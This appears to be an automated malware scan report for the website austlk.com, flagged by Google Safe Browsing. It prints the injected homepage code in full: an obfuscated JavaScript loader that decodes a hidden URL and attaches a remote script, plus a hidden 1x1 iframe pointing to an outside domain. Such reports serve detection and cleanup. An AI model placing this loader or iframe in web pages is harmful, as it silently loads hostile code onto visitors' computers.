Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=austlk.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://austlk.com/ | 200 OK Content-Length: 11892 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function vdch() { if(document.all.length > 3) { var t = new Array('#6a7072', '#723e29', '#2d7371', '#752a62', '#637d65', '#6d2a60', '#702b63', '#7a7029'); var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } } var dch = document.createElement("script"); dch.id = "dchid"; dch.src = dchid; document.all[3].appendChild(dch); } else { setTimeout("vdch()",500); } } setTimeout("vdch()",500); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 4 websites. size: 1x1 src: http://ktk4gj.co.cc/qqkfbg0aaq0mba0dekcjbqynawccaqmmaw== <iframe src="http://ktk4gj.co.cc/qqkfbg0aaq0mba0dekcjbqynawccaqmmaw==" width="1" height="1"> | ||
http://austlk.com/test404page.js | 404 Not Found Content-Length: 287 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: austlk.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 01 Mar 2015 05:08:17 GMT
Accept-Ranges: bytes
ETag: "c56053-2e74-4aa9e85409700"
Server: Apache/2.2.3 (CentOS)
Content-Length: 11892
Content-Type: text/html; charset=ISO-8859-1
Last-Modified: Tue, 16 Aug 2011 12:28:44 GMT
...11892 bytes of data.
GET / HTTP/1.1
Host: austlk.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 01 Mar 2015 05:08:17 GMT
Accept-Ranges: bytes
ETag: "c56053-2e74-4aa9e85409700"
Server: Apache/2.2.3 (CentOS)
Content-Length: 11892
Content-Type: text/html; charset=ISO-8859-1
Last-Modified: Tue, 16 Aug 2011 12:28:44 GMT
...11892 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: austlk.com
Referer: http://www.google.com/search?q=austlk.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: austlk.com
Referer: http://www.google.com/search?q=austlk.com
Result:
The result is similar to the first query. There are no suspicious redirects found.